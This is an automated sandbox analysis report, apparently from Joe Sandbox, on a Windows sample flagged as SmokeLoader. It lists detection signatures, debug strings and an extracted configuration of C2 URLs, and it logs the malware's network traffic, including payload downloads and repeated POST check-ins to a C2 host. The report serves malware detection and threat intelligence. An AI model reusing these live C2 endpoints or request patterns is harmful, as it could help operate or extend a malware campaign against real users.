Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 756294
MD5: 1cf06beb83d2bd1afd1b9b62994e7549
SHA1: 88bd7da7668fb669b5503696ee0a9c0f2dbeceb7
SHA256: 4dc0de570728f75f844c7afb84ac6c809ef4620dac3b12a884ff9916f5b5b0ee
Tags: exeSmokeLoader
Infos:

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected UAC Bypass using CMSTP
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Maps a DLL or memory area into another process
Machine Learning detection for sample
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Yara detected Keylogger Generic
Launches processes in debugging mode, may be used to hinder debugging
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

barindex
Source: file.exe Virustotal: Detection: 33% Perma Link
Source: http://piratia.su/tmp/ URL Reputation: Label: malware
Source: http://piratia.su/tmp/ URL Reputation: Label: malware
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\dfhwrav Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5AF.exe Joe Sandbox ML: detected
Source: 22.2.5AF.exe.23be12c.2.unpack Avira: Label: TR/Patched.Ren.Gen7
Source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://piratia.su/tmp/", "http://dowe.at/tmp/", "http://xisac.com/tmp/", "http://newhorizonswv.com/tmp/", "http://cracker.biz/tmp/", "http://piratia-life.ru/tmp/"]}
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: 10_2_00878884 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 10_2_00878884
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: 10_2_00881940 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptReleaseContext, 10_2_00881940
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: 10_2_0087885C CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash, 10_2_0087885C
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: 10_2_008799FF CryptDestroyHash, 10_2_008799FF
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: 10_2_0087A511 CryptReleaseContext, 10_2_0087A511
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: 10_2_00884967 CryptReleaseContext, 10_2_00884967
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: 10_2_00883F6C CryptDestroyHash, 10_2_00883F6C

Exploits

barindex
Source: Yara match File source: 16.2.5AF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.5AF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000016.00000002.517229882.0000000000413000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.486093572.0000000000413000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY

Compliance

barindex
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Unpacked PE file: 10.2.ADCA.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\5AF.exe Unpacked PE file: 16.2.5AF.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\5AF.exe Unpacked PE file: 22.2.5AF.exe.400000.0.unpack
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.6:49739 version: TLS 1.2
Source: Binary string: setupapi.pdbf source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, 5AF.exe, 00000016.00000002.522529716.00000000023B8000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: cryptbase.pdbD source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\dohaf\kaxidin\wukoni\wefof\nojeyuve jucahazetozep zisasime.pdb0f source: 5AF.exe, 00000010.00000000.456599162.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, 5AF.exe, 00000016.00000000.482478776.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msctf.pdby source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: comctl32v582.pdbB source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wsspicli.pdb6 source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: fltLib.pdbR source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mpr.pdbA source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: sechost.pdb0 source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Qrundll32.pdb source: WerFault.exe, 00000013.00000003.506255817.0000000004740000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000003.489353790.000000000473F000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000003.494807738.000000000473F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: Qrundll32.pdb^t source: WerFault.exe, 00000013.00000003.527460296.0000000004740000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000003.527287787.0000000004740000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: shcore.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: 5AF.exe, 00000010.00000002.485930859.0000000000410000.00000040.00000001.01000000.0000000B.sdmp, 5AF.exe, 00000016.00000002.517131758.0000000000410000.00000040.00000001.01000000.0000000B.sdmp
Source: Binary string: C:\xehalulomuto\5\wacewatolere ciralameko_sunumeginupah\kupuwu.pdb source: ADCA.exe, 0000000A.00000000.410105733.0000000000401000.00000020.00000001.01000000.00000008.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: iphlpapi.pdbz source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: shell32.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: combase.pdbt source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 5C:\xehalulomuto\5\wacewatolere ciralameko_sunumeginupah\kupuwu.pdb0f source: ADCA.exe, 0000000A.00000000.410105733.0000000000401000.00000020.00000001.01000000.00000008.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\yepiro_lafonu\vekamogudit62\deney\jef.pdb source: file.exe, 00000000.00000000.243494837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, dfhwrav, 00000009.00000000.369163815.0000000000401000.00000020.00000001.01000000.00000007.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: propsys.pdb` source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sfc.pdbB source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: oleaut32.pdbl source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: IC:\yepiro_lafonu\vekamogudit62\deney\jef.pdb0f source: file.exe, 00000000.00000000.243494837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, dfhwrav, 00000009.00000000.369163815.0000000000401000.00000020.00000001.01000000.00000007.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: advapi32.pdbJ source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netapi32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, 5AF.exe, 00000016.00000002.522529716.00000000023B8000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: rundll32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sfc.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: powrprof.pdbX source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\dohaf\kaxidin\wukoni\wefof\nojeyuve jucahazetozep zisasime.pdb source: 5AF.exe, 00000010.00000000.456599162.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, 5AF.exe, 00000016.00000000.482478776.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: profapi.pdb^ source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netutils.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netapi32.pdbk source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: 10_2_0040D450 FindFirstFileW,FindClose, 10_2_0040D450
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: 10_2_004235B0 FindFirstFileW,FindClose, 10_2_004235B0
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: 10_2_0040CE84 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW, 10_2_0040CE84

Networking

barindex
Source: C:\Windows\explorer.exe Domain query: thepokeway.nl
Source: C:\Windows\explorer.exe Network Connect: 123.253.32.170 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: dowe.at
Source: Malware configuration extractor URLs: http://piratia.su/tmp/
Source: Malware configuration extractor URLs: http://dowe.at/tmp/
Source: Malware configuration extractor URLs: http://xisac.com/tmp/
Source: Malware configuration extractor URLs: http://newhorizonswv.com/tmp/
Source: Malware configuration extractor URLs: http://cracker.biz/tmp/
Source: Malware configuration extractor URLs: http://piratia-life.ru/tmp/
Source: Joe Sandbox View ASN Name: OVHFR OVHFR
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View IP Address: 5.135.247.111 5.135.247.111
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.2Date: Tue, 29 Nov 2022 23:11:06 GMTContent-Type: application/octet-streamContent-Length: 3776000Last-Modified: Tue, 29 Nov 2022 23:10:03 GMTConnection: keep-aliveETag: "6386914b-399e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 71 fa 27 a0 35 9b 49 f3 35 9b 49 f3 35 9b 49 f3 88 d4 df f3 34 9b 49 f3 2b c9 dc f3 24 9b 49 f3 2b c9 ca f3 5d 9b 49 f3 12 5d 32 f3 32 9b 49 f3 35 9b 48 f3 af 9b 49 f3 2b c9 cd f3 17 9b 49 f3 2b c9 dd f3 34 9b 49 f3 2b c9 d8 f3 34 9b 49 f3 52 69 63 68 35 9b 49 f3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a2 ac e5 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 08 01 00 00 02 3c 00 00 00 00 00 97 4c 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 4f 00 00 04 00 00 01 9d 3a 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 9c 0a 01 00 50 00 00 00 00 c0 3c 00 50 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 2d 00 00 18 00 00 00 d8 2c 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 07 01 00 00 10 00 00 00 08 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 97 3b 00 00 20 01 00 00 60 38 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 50 12 00 00 c0 3c 00 00 32 00 00 00 6c 39 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /upload/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: thepokeway.nl
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tajcoxqjmd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://owxfgf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dqkjujneki.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yfupv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lawtvrqx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: dowe.at
Source: global traffic HTTP traffic detected: GET /root2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 123.253.32.170
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://frwum.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ifardcruc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gbbshbjmpq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dkguxo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://frdxrq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 168Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://plraoc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 351Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://panajd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://queeh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lvqyks.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oidcj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ljwdjes.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bajxyhac.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fbxsgv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: dowe.at
